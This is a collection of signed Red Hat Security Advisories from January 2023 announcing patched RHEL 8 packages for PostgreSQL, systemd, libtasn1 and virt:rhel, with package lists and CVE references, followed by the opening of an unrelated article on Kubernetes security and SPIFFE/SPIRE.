Red Hat Security Advisory 2023-0113-01 - PostgreSQL is an advanced object-relational database management system.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: postgresql:10 security update  
Advisory ID:       RHSA-2023:0113-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:0113  
Issue date:        2023-01-12  
CVE Names:         CVE-2022-2625   
=====================================================================

1. Summary:

An update for the postgresql:10 module is now available for Red Hat  
Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 8) - aarch64, ppc64le, s390x, x86_64

3. Description:

PostgreSQL is an advanced object-relational database management system  
(DBMS).

Security Fix(es):

* postgresql: Extension scripts replace objects not belonging to the  
extension. (CVE-2022-2625)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

If the postgresql service is running, it will be automatically restarted  
after installing this update.

5. Bugs fixed (https://bugzilla.redhat.com/):

2113825 - CVE-2022-2625 postgresql: Extension scripts replace objects not belonging to the extension.

6. Package List:

Red Hat Enterprise Linux AppStream (v. 8):

Source:  
postgresql-10.23-1.module+el8.7.0+17280+3a452e1f.src.rpm

aarch64:  
postgresql-10.23-1.module+el8.7.0+17280+3a452e1f.aarch64.rpm  
postgresql-contrib-10.23-1.module+el8.7.0+17280+3a452e1f.aarch64.rpm  
postgresql-contrib-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.aarch64.rpm  
postgresql-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.aarch64.rpm  
postgresql-debugsource-10.23-1.module+el8.7.0+17280+3a452e1f.aarch64.rpm  
postgresql-docs-10.23-1.module+el8.7.0+17280+3a452e1f.aarch64.rpm  
postgresql-docs-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.aarch64.rpm  
postgresql-plperl-10.23-1.module+el8.7.0+17280+3a452e1f.aarch64.rpm  
postgresql-plperl-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.aarch64.rpm  
postgresql-plpython3-10.23-1.module+el8.7.0+17280+3a452e1f.aarch64.rpm  
postgresql-plpython3-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.aarch64.rpm  
postgresql-pltcl-10.23-1.module+el8.7.0+17280+3a452e1f.aarch64.rpm  
postgresql-pltcl-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.aarch64.rpm  
postgresql-server-10.23-1.module+el8.7.0+17280+3a452e1f.aarch64.rpm  
postgresql-server-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.aarch64.rpm  
postgresql-server-devel-10.23-1.module+el8.7.0+17280+3a452e1f.aarch64.rpm  
postgresql-server-devel-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.aarch64.rpm  
postgresql-static-10.23-1.module+el8.7.0+17280+3a452e1f.aarch64.rpm  
postgresql-test-10.23-1.module+el8.7.0+17280+3a452e1f.aarch64.rpm  
postgresql-test-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.aarch64.rpm  
postgresql-test-rpm-macros-10.23-1.module+el8.7.0+17280+3a452e1f.aarch64.rpm  
postgresql-upgrade-10.23-1.module+el8.7.0+17280+3a452e1f.aarch64.rpm  
postgresql-upgrade-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.aarch64.rpm  
postgresql-upgrade-devel-10.23-1.module+el8.7.0+17280+3a452e1f.aarch64.rpm  
postgresql-upgrade-devel-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.aarch64.rpm

ppc64le:  
postgresql-10.23-1.module+el8.7.0+17280+3a452e1f.ppc64le.rpm  
postgresql-contrib-10.23-1.module+el8.7.0+17280+3a452e1f.ppc64le.rpm  
postgresql-contrib-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.ppc64le.rpm  
postgresql-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.ppc64le.rpm  
postgresql-debugsource-10.23-1.module+el8.7.0+17280+3a452e1f.ppc64le.rpm  
postgresql-docs-10.23-1.module+el8.7.0+17280+3a452e1f.ppc64le.rpm  
postgresql-docs-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.ppc64le.rpm  
postgresql-plperl-10.23-1.module+el8.7.0+17280+3a452e1f.ppc64le.rpm  
postgresql-plperl-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.ppc64le.rpm  
postgresql-plpython3-10.23-1.module+el8.7.0+17280+3a452e1f.ppc64le.rpm  
postgresql-plpython3-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.ppc64le.rpm  
postgresql-pltcl-10.23-1.module+el8.7.0+17280+3a452e1f.ppc64le.rpm  
postgresql-pltcl-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.ppc64le.rpm  
postgresql-server-10.23-1.module+el8.7.0+17280+3a452e1f.ppc64le.rpm  
postgresql-server-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.ppc64le.rpm  
postgresql-server-devel-10.23-1.module+el8.7.0+17280+3a452e1f.ppc64le.rpm  
postgresql-server-devel-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.ppc64le.rpm  
postgresql-static-10.23-1.module+el8.7.0+17280+3a452e1f.ppc64le.rpm  
postgresql-test-10.23-1.module+el8.7.0+17280+3a452e1f.ppc64le.rpm  
postgresql-test-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.ppc64le.rpm  
postgresql-test-rpm-macros-10.23-1.module+el8.7.0+17280+3a452e1f.ppc64le.rpm  
postgresql-upgrade-10.23-1.module+el8.7.0+17280+3a452e1f.ppc64le.rpm  
postgresql-upgrade-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.ppc64le.rpm  
postgresql-upgrade-devel-10.23-1.module+el8.7.0+17280+3a452e1f.ppc64le.rpm  
postgresql-upgrade-devel-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.ppc64le.rpm

s390x:  
postgresql-10.23-1.module+el8.7.0+17280+3a452e1f.s390x.rpm  
postgresql-contrib-10.23-1.module+el8.7.0+17280+3a452e1f.s390x.rpm  
postgresql-contrib-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.s390x.rpm  
postgresql-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.s390x.rpm  
postgresql-debugsource-10.23-1.module+el8.7.0+17280+3a452e1f.s390x.rpm  
postgresql-docs-10.23-1.module+el8.7.0+17280+3a452e1f.s390x.rpm  
postgresql-docs-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.s390x.rpm  
postgresql-plperl-10.23-1.module+el8.7.0+17280+3a452e1f.s390x.rpm  
postgresql-plperl-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.s390x.rpm  
postgresql-plpython3-10.23-1.module+el8.7.0+17280+3a452e1f.s390x.rpm  
postgresql-plpython3-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.s390x.rpm  
postgresql-pltcl-10.23-1.module+el8.7.0+17280+3a452e1f.s390x.rpm  
postgresql-pltcl-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.s390x.rpm  
postgresql-server-10.23-1.module+el8.7.0+17280+3a452e1f.s390x.rpm  
postgresql-server-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.s390x.rpm  
postgresql-server-devel-10.23-1.module+el8.7.0+17280+3a452e1f.s390x.rpm  
postgresql-server-devel-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.s390x.rpm  
postgresql-static-10.23-1.module+el8.7.0+17280+3a452e1f.s390x.rpm  
postgresql-test-10.23-1.module+el8.7.0+17280+3a452e1f.s390x.rpm  
postgresql-test-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.s390x.rpm  
postgresql-test-rpm-macros-10.23-1.module+el8.7.0+17280+3a452e1f.s390x.rpm  
postgresql-upgrade-10.23-1.module+el8.7.0+17280+3a452e1f.s390x.rpm  
postgresql-upgrade-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.s390x.rpm  
postgresql-upgrade-devel-10.23-1.module+el8.7.0+17280+3a452e1f.s390x.rpm  
postgresql-upgrade-devel-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.s390x.rpm

x86_64:  
postgresql-10.23-1.module+el8.7.0+17280+3a452e1f.x86_64.rpm  
postgresql-contrib-10.23-1.module+el8.7.0+17280+3a452e1f.x86_64.rpm  
postgresql-contrib-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.x86_64.rpm  
postgresql-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.x86_64.rpm  
postgresql-debugsource-10.23-1.module+el8.7.0+17280+3a452e1f.x86_64.rpm  
postgresql-docs-10.23-1.module+el8.7.0+17280+3a452e1f.x86_64.rpm  
postgresql-docs-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.x86_64.rpm  
postgresql-plperl-10.23-1.module+el8.7.0+17280+3a452e1f.x86_64.rpm  
postgresql-plperl-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.x86_64.rpm  
postgresql-plpython3-10.23-1.module+el8.7.0+17280+3a452e1f.x86_64.rpm  
postgresql-plpython3-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.x86_64.rpm  
postgresql-pltcl-10.23-1.module+el8.7.0+17280+3a452e1f.x86_64.rpm  
postgresql-pltcl-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.x86_64.rpm  
postgresql-server-10.23-1.module+el8.7.0+17280+3a452e1f.x86_64.rpm  
postgresql-server-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.x86_64.rpm  
postgresql-server-devel-10.23-1.module+el8.7.0+17280+3a452e1f.x86_64.rpm  
postgresql-server-devel-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.x86_64.rpm  
postgresql-static-10.23-1.module+el8.7.0+17280+3a452e1f.x86_64.rpm  
postgresql-test-10.23-1.module+el8.7.0+17280+3a452e1f.x86_64.rpm  
postgresql-test-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.x86_64.rpm  
postgresql-test-rpm-macros-10.23-1.module+el8.7.0+17280+3a452e1f.x86_64.rpm  
postgresql-upgrade-10.23-1.module+el8.7.0+17280+3a452e1f.x86_64.rpm  
postgresql-upgrade-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.x86_64.rpm  
postgresql-upgrade-devel-10.23-1.module+el8.7.0+17280+3a452e1f.x86_64.rpm  
postgresql-upgrade-devel-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-2625  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY7/i99zjgjWX9erEAQiXbA//WFJNDVuYD112PQg6wO+FY9ee3L4eDa7x  
XIuCvIpVe6MxugA85cM0/h6NyvsUM7PyZC0aH/QU2uN2yDVgYr39xLNexocHvxAR  
EFiJOZhK+24uBxc9bfm+jVNqtbVOjkzhScUwjNtP5W4QZbBxzgPPTb0Ybzd9ixvk  
GV8DifcjfX1edlBCqV78Hx1P1ISSMipKeTs5HtHsAZ4uK53anrdqZASe2yVy/FVr  
D/s1DeKfWh/AF/6w5JNWB+MWgsQzOnoXH25agzJAE91+uewLk1XWIm3ky7efSYny  
2QwuNCseR5IL1rdaSCgIZY1+khyc1qMk9MxRUs54bJzWi8OMJXvsN08I8gsngrxV  
Nf27NQfMx9KjIkMo/+cV93rWHzhsjzM0uNb1CrJvBNtr5xWfIsD4vTiSJIP91hpY  
hBqo8+1pI6Wo66dQkrLDrSo7gdmcLegE56GEAZtwEMPyraXcvb5qToM4OVW8kiVE  
4Kw7CGodi864kesB6ZCKPY7vr68/OjOkWhvbqtbQ1D9kz1UvzRMAAF0meP5fA//s  
PLidab430BWeGd1UagqkQVVBSZ+TTD+oOJwIb+dJBTYpZnEkIuNe4h7eHFW1PTLn  
dCR2CI6UsDUzMPS6bjklqaGEFxCLZpn2c7xzyKhcvOwmhEJEm0UWIAZZNk5ip4b0  
C67oezmmLbg=  
=GaKj  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-0113-01

Red Hat Security Advisory 2023-0100-01 - The systemd packages contain systemd, a system and service manager for Linux, compatible with the SysV and LSB init scripts. It provides aggressive parallelism capabilities, uses socket and D-Bus activation for starting services, offers on-demand starting of daemons, and keeps track of processes using Linux cgroups.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: systemd security and bug fix update  
Advisory ID:       RHSA-2023:0100-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:0100  
Issue date:        2023-01-12  
CVE Names:         CVE-2022-3821   
=====================================================================

1. Summary:

An update for systemd is now available for Red Hat Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux BaseOS (v. 8) - aarch64, ppc64le, s390x, x86_64

3. Description:

The systemd packages contain systemd, a system and service manager for  
Linux, compatible with the SysV and LSB init scripts. It provides  
aggressive parallelism capabilities, uses socket and D-Bus activation for  
starting services, offers on-demand starting of daemons, and keeps track of  
processes using Linux cgroups. In addition, it supports snapshotting and  
restoring of the system state, maintains mount and automount points, and  
implements an elaborate transactional dependency-based service control  
logic. It can also work as a drop-in replacement for sysvinit.

Security Fix(es):

* systemd: buffer overrun in format_timespan() function (CVE-2022-3821)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Bug Fix(es):

* ShutdownWatchdogSec value is not taken into account on reboot  
(BZ#2127170)

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2127170 - ShutdownWatchdogSec value is not taken into account on reboot [rhel-8.7.0.z]  
2139327 - CVE-2022-3821 systemd: buffer overrun in format_timespan() function

6. Package List:

Red Hat Enterprise Linux BaseOS (v. 8):

Source:  
systemd-239-68.el8_7.1.src.rpm

aarch64:  
systemd-239-68.el8_7.1.aarch64.rpm  
systemd-container-239-68.el8_7.1.aarch64.rpm  
systemd-container-debuginfo-239-68.el8_7.1.aarch64.rpm  
systemd-debuginfo-239-68.el8_7.1.aarch64.rpm  
systemd-debugsource-239-68.el8_7.1.aarch64.rpm  
systemd-devel-239-68.el8_7.1.aarch64.rpm  
systemd-journal-remote-239-68.el8_7.1.aarch64.rpm  
systemd-journal-remote-debuginfo-239-68.el8_7.1.aarch64.rpm  
systemd-libs-239-68.el8_7.1.aarch64.rpm  
systemd-libs-debuginfo-239-68.el8_7.1.aarch64.rpm  
systemd-pam-239-68.el8_7.1.aarch64.rpm  
systemd-pam-debuginfo-239-68.el8_7.1.aarch64.rpm  
systemd-tests-239-68.el8_7.1.aarch64.rpm  
systemd-tests-debuginfo-239-68.el8_7.1.aarch64.rpm  
systemd-udev-239-68.el8_7.1.aarch64.rpm  
systemd-udev-debuginfo-239-68.el8_7.1.aarch64.rpm

ppc64le:  
systemd-239-68.el8_7.1.ppc64le.rpm  
systemd-container-239-68.el8_7.1.ppc64le.rpm  
systemd-container-debuginfo-239-68.el8_7.1.ppc64le.rpm  
systemd-debuginfo-239-68.el8_7.1.ppc64le.rpm  
systemd-debugsource-239-68.el8_7.1.ppc64le.rpm  
systemd-devel-239-68.el8_7.1.ppc64le.rpm  
systemd-journal-remote-239-68.el8_7.1.ppc64le.rpm  
systemd-journal-remote-debuginfo-239-68.el8_7.1.ppc64le.rpm  
systemd-libs-239-68.el8_7.1.ppc64le.rpm  
systemd-libs-debuginfo-239-68.el8_7.1.ppc64le.rpm  
systemd-pam-239-68.el8_7.1.ppc64le.rpm  
systemd-pam-debuginfo-239-68.el8_7.1.ppc64le.rpm  
systemd-tests-239-68.el8_7.1.ppc64le.rpm  
systemd-tests-debuginfo-239-68.el8_7.1.ppc64le.rpm  
systemd-udev-239-68.el8_7.1.ppc64le.rpm  
systemd-udev-debuginfo-239-68.el8_7.1.ppc64le.rpm

s390x:  
systemd-239-68.el8_7.1.s390x.rpm  
systemd-container-239-68.el8_7.1.s390x.rpm  
systemd-container-debuginfo-239-68.el8_7.1.s390x.rpm  
systemd-debuginfo-239-68.el8_7.1.s390x.rpm  
systemd-debugsource-239-68.el8_7.1.s390x.rpm  
systemd-devel-239-68.el8_7.1.s390x.rpm  
systemd-journal-remote-239-68.el8_7.1.s390x.rpm  
systemd-journal-remote-debuginfo-239-68.el8_7.1.s390x.rpm  
systemd-libs-239-68.el8_7.1.s390x.rpm  
systemd-libs-debuginfo-239-68.el8_7.1.s390x.rpm  
systemd-pam-239-68.el8_7.1.s390x.rpm  
systemd-pam-debuginfo-239-68.el8_7.1.s390x.rpm  
systemd-tests-239-68.el8_7.1.s390x.rpm  
systemd-tests-debuginfo-239-68.el8_7.1.s390x.rpm  
systemd-udev-239-68.el8_7.1.s390x.rpm  
systemd-udev-debuginfo-239-68.el8_7.1.s390x.rpm

x86_64:  
systemd-239-68.el8_7.1.i686.rpm  
systemd-239-68.el8_7.1.x86_64.rpm  
systemd-container-239-68.el8_7.1.i686.rpm  
systemd-container-239-68.el8_7.1.x86_64.rpm  
systemd-container-debuginfo-239-68.el8_7.1.i686.rpm  
systemd-container-debuginfo-239-68.el8_7.1.x86_64.rpm  
systemd-debuginfo-239-68.el8_7.1.i686.rpm  
systemd-debuginfo-239-68.el8_7.1.x86_64.rpm  
systemd-debugsource-239-68.el8_7.1.i686.rpm  
systemd-debugsource-239-68.el8_7.1.x86_64.rpm  
systemd-devel-239-68.el8_7.1.i686.rpm  
systemd-devel-239-68.el8_7.1.x86_64.rpm  
systemd-journal-remote-239-68.el8_7.1.x86_64.rpm  
systemd-journal-remote-debuginfo-239-68.el8_7.1.i686.rpm  
systemd-journal-remote-debuginfo-239-68.el8_7.1.x86_64.rpm  
systemd-libs-239-68.el8_7.1.i686.rpm  
systemd-libs-239-68.el8_7.1.x86_64.rpm  
systemd-libs-debuginfo-239-68.el8_7.1.i686.rpm  
systemd-libs-debuginfo-239-68.el8_7.1.x86_64.rpm  
systemd-pam-239-68.el8_7.1.x86_64.rpm  
systemd-pam-debuginfo-239-68.el8_7.1.i686.rpm  
systemd-pam-debuginfo-239-68.el8_7.1.x86_64.rpm  
systemd-tests-239-68.el8_7.1.x86_64.rpm  
systemd-tests-debuginfo-239-68.el8_7.1.i686.rpm  
systemd-tests-debuginfo-239-68.el8_7.1.x86_64.rpm  
systemd-udev-239-68.el8_7.1.x86_64.rpm  
systemd-udev-debuginfo-239-68.el8_7.1.i686.rpm  
systemd-udev-debuginfo-239-68.el8_7.1.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-3821  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY7/i9NzjgjWX9erEAQjKXg//akCX8D/qkLQEtcWYa0m9aXlkPwsCWkPY  
ScbAPZer9Pq8Nc+F9QTwuQoip+4iZ9nmUzOfqBllp81JMnn2gzT0y3NZWNNxZvaX  
1zMyUo7kA+tBDUL0PkMjchNRU/JWAlL962jXmUnuFMRoNyjFuccvodCvalSTuH2q  
eleJ+ClSVqPyusDbzNsXT/00d9ee7IFDTvmxUaf5jDpT6kUH3h/P4QtfQPLR7WL1  
/khIvs0r6FKaSqjYrhkeo9DYCo/VDzWmKL3FbY4ZY3EiEtbbwGrgPa4PSAxNIH7x  
8UKhzMRi22bcqIpdFxdcWaMGzl0vTeJHbHx3BgPtCGFldivlu6DBth0iRMbOpQsH  
zZu6/W8rOBbFw1hX2vfOKgSt3EcP08BCvOYq+5m+kUONPpbkDa4E8VtbEb8Tl/FV  
CdhNOhQTT4XTa2hrxYI/0H26i2C/m3YZyGpm2XzsrZtQLEatFjI1HDR6nPdeNNsF  
HxuYxr5ac8LCTDbg1hgRtjj2bVQvoCV5PwbbA82Q7h4kRuuoN1iedq/p+7hhPVjh  
cQlPK6ivq4txHCz0R0azo4yA6lIBM4CwxtjdWjEqAt85Wr3cW3WpOO3g0KCrPPRO  
M/Knn7fxDWbusU+m1mp6CM6A1ITmWcUvtJHhwD8dv1SjXwHIWwHPlD7TiI2Y3icZ  
I8bFgejxn4U=  
=QrfL  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-0100-01

Red Hat Security Advisory 2023-0116-01 - A library that provides Abstract Syntax Notation One parsing and structures management, and Distinguished Encoding Rules encoding and decoding functions.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: libtasn1 security update  
Advisory ID:       RHSA-2023:0116-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:0116  
Issue date:        2023-01-12  
CVE Names:         CVE-2021-46848   
=====================================================================

1. Summary:

An update for libtasn1 is now available for Red Hat Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 8) - aarch64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux BaseOS (v. 8) - aarch64, ppc64le, s390x, x86_64

3. Description:

A library that provides Abstract Syntax Notation One (ASN.1, as specified  
by the X.680 ITU-T recommendation) parsing and structures management, and  
Distinguished Encoding Rules (DER, as per X.690) encoding and decoding  
functions.

Security Fix(es):

* libtasn1: Out-of-bound access in ETYPE_OK (CVE-2021-46848)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2140058 - CVE-2021-46848 libtasn1: Out-of-bound access in ETYPE_OK

6. Package List:

Red Hat Enterprise Linux AppStream (v. 8):

aarch64:  
libtasn1-debuginfo-4.13-4.el8_7.aarch64.rpm  
libtasn1-debugsource-4.13-4.el8_7.aarch64.rpm  
libtasn1-devel-4.13-4.el8_7.aarch64.rpm  
libtasn1-tools-4.13-4.el8_7.aarch64.rpm  
libtasn1-tools-debuginfo-4.13-4.el8_7.aarch64.rpm

ppc64le:  
libtasn1-debuginfo-4.13-4.el8_7.ppc64le.rpm  
libtasn1-debugsource-4.13-4.el8_7.ppc64le.rpm  
libtasn1-devel-4.13-4.el8_7.ppc64le.rpm  
libtasn1-tools-4.13-4.el8_7.ppc64le.rpm  
libtasn1-tools-debuginfo-4.13-4.el8_7.ppc64le.rpm

s390x:  
libtasn1-debuginfo-4.13-4.el8_7.s390x.rpm  
libtasn1-debugsource-4.13-4.el8_7.s390x.rpm  
libtasn1-devel-4.13-4.el8_7.s390x.rpm  
libtasn1-tools-4.13-4.el8_7.s390x.rpm  
libtasn1-tools-debuginfo-4.13-4.el8_7.s390x.rpm

x86_64:  
libtasn1-debuginfo-4.13-4.el8_7.i686.rpm  
libtasn1-debuginfo-4.13-4.el8_7.x86_64.rpm  
libtasn1-debugsource-4.13-4.el8_7.i686.rpm  
libtasn1-debugsource-4.13-4.el8_7.x86_64.rpm  
libtasn1-devel-4.13-4.el8_7.i686.rpm  
libtasn1-devel-4.13-4.el8_7.x86_64.rpm  
libtasn1-tools-4.13-4.el8_7.x86_64.rpm  
libtasn1-tools-debuginfo-4.13-4.el8_7.i686.rpm  
libtasn1-tools-debuginfo-4.13-4.el8_7.x86_64.rpm

Red Hat Enterprise Linux BaseOS (v. 8):

Source:  
libtasn1-4.13-4.el8_7.src.rpm

aarch64:  
libtasn1-4.13-4.el8_7.aarch64.rpm  
libtasn1-debuginfo-4.13-4.el8_7.aarch64.rpm  
libtasn1-debugsource-4.13-4.el8_7.aarch64.rpm  
libtasn1-tools-debuginfo-4.13-4.el8_7.aarch64.rpm

ppc64le:  
libtasn1-4.13-4.el8_7.ppc64le.rpm  
libtasn1-debuginfo-4.13-4.el8_7.ppc64le.rpm  
libtasn1-debugsource-4.13-4.el8_7.ppc64le.rpm  
libtasn1-tools-debuginfo-4.13-4.el8_7.ppc64le.rpm

s390x:  
libtasn1-4.13-4.el8_7.s390x.rpm  
libtasn1-debuginfo-4.13-4.el8_7.s390x.rpm  
libtasn1-debugsource-4.13-4.el8_7.s390x.rpm  
libtasn1-tools-debuginfo-4.13-4.el8_7.s390x.rpm

x86_64:  
libtasn1-4.13-4.el8_7.i686.rpm  
libtasn1-4.13-4.el8_7.x86_64.rpm  
libtasn1-debuginfo-4.13-4.el8_7.i686.rpm  
libtasn1-debuginfo-4.13-4.el8_7.x86_64.rpm  
libtasn1-debugsource-4.13-4.el8_7.i686.rpm  
libtasn1-debugsource-4.13-4.el8_7.x86_64.rpm  
libtasn1-tools-debuginfo-4.13-4.el8_7.i686.rpm  
libtasn1-tools-debuginfo-4.13-4.el8_7.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2021-46848  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY7/i8dzjgjWX9erEAQiZmhAAmQwNAKws70pWIocKzUsb/fYYYMcchqrn  
43gAEVYZ+USKwd0/le9Xbhx7Z22mrabueClq9A74J4B2YXmzFqOJLOz+7LCQAx8+  
B86MlnkcRHNTT5tyi6qmWTm99GqOpyuKf30N5AYceAfBbCO6D9B2bBEyaIb+uSwB  
Sw5EJJFblXhZlHF67K6Lp7I6NSj5aSK+KT6Jru5qJQ/v6K5TznOIyvUJriW4GyQK  
n+xhXLizOV14Rkh6TaWarz7fIKWsAffLUU+n2ZJ3bPbRrL7PqNrTm46AJoZgNK51  
0IbA5xORFGgJaUk+3dTiwvqr6yBSWGWyztqOi7ywoGdeGZf768YHzcMNbTqAGmrd  
wETBwvg/QMSZHeJ62ALGOnkGgzFZqr8/Yu4hJ2Tb8D6oww6MWO4E2Z/BB8madOA+  
q05+JfrIDe3WU+GMYjlmzjezWbKmAQdUnbPkX0fCYtT+0D7R8HN8MLCOR8Bi/Vlo  
06gjDT0rKElpETR81LF70shM6vXRQ4UjmwmPXcHbNTCiNSgE8NNy7woEZT1rsYog  
dY2Y9Ah2nodWTgObLn2X9XEsgjr/lc2Dc4l3DCl1l2sdI74UstqAiYiM6L6QTC/r  
E5wlx10mcbHPTXUOh+NbESzH5IWuqKXaxWjdp0R4vCLuN4+WUHAu9dN2YQTk1E89  
m3+mOt3oApY=  
=53fB  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-0116-01

Red Hat Security Advisory 2023-0099-01 - Kernel-based Virtual Machine offers a full virtualization solution for Linux on numerous hardware platforms. The virt:rhel module contains packages which provide user-space components used to run virtual machines using KVM. The packages also provide APIs for managing and interacting with the virtualized systems. Issues addressed include an out of bounds read vulnerability.

Red Hat Security Advisory 2023-0099-01

Organizations must be vigilant about balancing performance gains with security, governance, and compliance as they expand their use of Kubernetes.

It's not so much whether organizations are using Kubernetes today, but how they are expanding its use. The use of multiple clusters, for example, is increasing and moving across organizational boundaries. Kubernetes itself is being shored up to meet the resulting security issues. The newest version, Kubernetes 1.26, adds features designed to strengthen the chain of trust, among other security updates. In fact, there are a number of projects organizations should be watching — and potentially evaluating — to ensure they are optimizing their use of Kubernetes while building stronger security, observability, governance, and compliance.

**SPIFFE and SPIRE****

Identity for everything is an important part of securing your Kubernetes environment, but end-to-end identity is still an unsolved problem — especially in multicluster Kubernetes environments. Say you have a service in Kubernetes and you need to authenticate to an off-cluster service that's running in the cloud or on-premises. How do you ensure you have a secure chain of identity from the launch of the service to all of the things it's communicating with and connecting to — on and off cluster?

